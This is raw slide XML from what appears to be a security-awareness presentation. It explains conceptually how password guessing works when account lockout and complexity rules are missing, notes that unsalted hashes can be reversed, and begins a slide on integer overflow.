              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EFD92E2-C672-5C44-B2A5-BB3855481940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6464804" y="1129277"/>
            <a:ext cx="4574142" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0"/>
              <a:t>If password hashes are not salted attackers can still reverse the password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286679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2BA3-307F-D840-9F44-974A71B2E195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807963" y="346237"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Guessing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E89D8679-1F9A-2648-8F7C-86B30C5BB2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4958235" y="1690688"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB10130-A562-DD4F-BCBD-74A67D5A6E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889342" y="2563525"/>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E058B272-AACE-CA40-ACD0-650290D3EB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0518" y="1650856"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10861651-A63F-2341-9B45-5037976551C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198316" y="2575052"/>
            <a:ext cx="960391" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B399A93-1375-A142-B811-E56CD1A0137A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="707721" y="1690688"/>
          <a:ext cx="1302705" cy="1371600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1302705">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>123456</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2642470997"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="851265560"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3311727319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ABCDEFG</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1813782707"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527123593"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6969D6-52B2-2D4D-9BD3-A2D9CEE20C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761850" y="3133280"/>
            <a:ext cx="1160767" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DD7B3EE-DF53-E649-A73D-7981F8164B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="2896313"/>
            <a:ext cx="8744" cy="3610958"/>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CD0E3E-4EA2-A044-9E70-1BADEEACE9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214196" y="2899032"/>
            <a:ext cx="0" cy="355187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FBE9ED-0A51-DC44-B610-9B72D88A6109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="screen">
            <a:alphaModFix amt="41000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="181217">
            <a:off x="5909959" y="1653210"/>
            <a:ext cx="2016164" cy="2205663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A94D0933-D312-5A45-B115-9DACCD38BF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142701" y="3855588"/>
            <a:ext cx="1667508" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1444E6-93CC-7C4A-A11E-AB559843EDAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598595" y="1787476"/>
            <a:ext cx="755720" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" strike="sngStrike" dirty="0"/>
              <a:t>Lockout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D47F43FB-6CA6-0547-AD01-C445EAFD5372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563606" y="2095807"/>
            <a:ext cx="1004314" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" strike="sngStrike" dirty="0"/>
              <a:t>Complexity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" strike="sngStrike" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113C0ABE-3687-3840-9DE4-121F5FA9B675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574756" y="3278357"/>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D6BA40-C7AF-704D-9B1F-8219FDA4F934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690772" y="2948614"/>
            <a:ext cx="1453924" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>123456' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5DCAEF-9286-B34F-8AD5-A76E9CE82105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566501" y="3292894"/>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8F63D0-8888-8A4E-83FB-2E07A3303CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570414">
            <a:off x="2505216" y="3561853"/>
            <a:ext cx="1822102" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invalid password!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6017866F-70FF-4E42-8C2F-FA2A56493E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567504" y="4171484"/>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3EB07-703B-174C-A38E-CD5CB15BBC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3566263" y="3843055"/>
            <a:ext cx="1648143" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>password' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEFCF0BD-0245-0946-9215-D888DB9EB2BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="4202375"/>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0B6A8D-7E8E-E44E-AFBA-670C4A81E98C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563066">
            <a:off x="2505014" y="4464282"/>
            <a:ext cx="1822102" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invalid password!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B08D5C5-2014-B34C-895D-C7B07265EF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3793578" y="4650115"/>
            <a:ext cx="343364" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Arrow Connector 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F00F4E6-168E-2F48-A802-F439CB5AFAC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583501" y="5496063"/>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06C3FB-36CC-7848-8DF5-AF92ED93240B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538663" y="5195167"/>
            <a:ext cx="1634615" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ABCDEFG' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Arrow Connector 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45539125-C3EA-0940-BC5D-1594A5FC35A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="5541499"/>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C91574-6A93-6C4F-86F8-8A08CEE96510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638428">
            <a:off x="2516078" y="5740911"/>
            <a:ext cx="1825756" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login authorized!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57445ED4-3902-134B-85FA-37CE02533BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8261675" y="1383458"/>
            <a:ext cx="3367763" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>A password guessing attack is the simplest type of hack. Lack of account lockout and lack of password complexity enforcements allow such attacks to happen.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384781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40D4-37ED-434B-B4DA-FB641A49DA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2253511" y="484179"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F5A244-D130-744F-B4E8-C1CD4C9855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3661870" y="1646559"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC44B1A-9DB9-B24C-91B6-2D3803F7C2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592977" y="2519396"/>
            <a:ext cx="732893" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30E9722-3BD4-6545-8B5E-E3CAFDA1B8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153" y="1606727"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF58C35F-DF7E-AF48-83E5-8546A687AB35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
